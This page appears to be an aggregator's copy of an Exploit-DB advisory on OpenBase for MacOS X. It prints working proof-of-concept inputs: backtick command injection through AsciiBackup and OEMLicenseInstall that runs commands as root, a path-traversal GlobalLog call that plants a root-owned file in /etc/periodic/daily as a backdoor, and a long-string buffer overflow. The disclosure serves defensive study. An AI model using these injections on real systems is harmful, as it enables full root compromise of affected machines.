header-logo
Suggest Exploit
vendor:
OpenBase
by:
7.5
CVSS
HIGH
Buffer-Overflow, Remote Command Execution
Buffer-Overflow, Command Injection
CWE
Product Name: OpenBase
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: MacOS X

OpenBase Buffer-Overflow and Remote Command Execution Vulnerabilities

The OpenBase software is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities. An attacker can exploit these issues to execute arbitrary code or commands with superuser privileges, leading to the complete compromise of affected computers. The vulnerabilities allow for commands to be run as root and for root-owned files to be created. Additionally, there is an issue with the 'zone_free()' function referencing a specific memory address. Another vulnerability allows for commands to be executed as root when using the 'OEMLicenseInstall()' function.

Mitigation:

The vendor has not released a patch for these vulnerabilities. It is recommended to restrict access to the affected software and monitor for any suspicious activity.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26347/info

OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.

An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate in the complete compromise of affected computers. 

1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1>  call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root

Navigation

Suggest Exploit

Services By CQR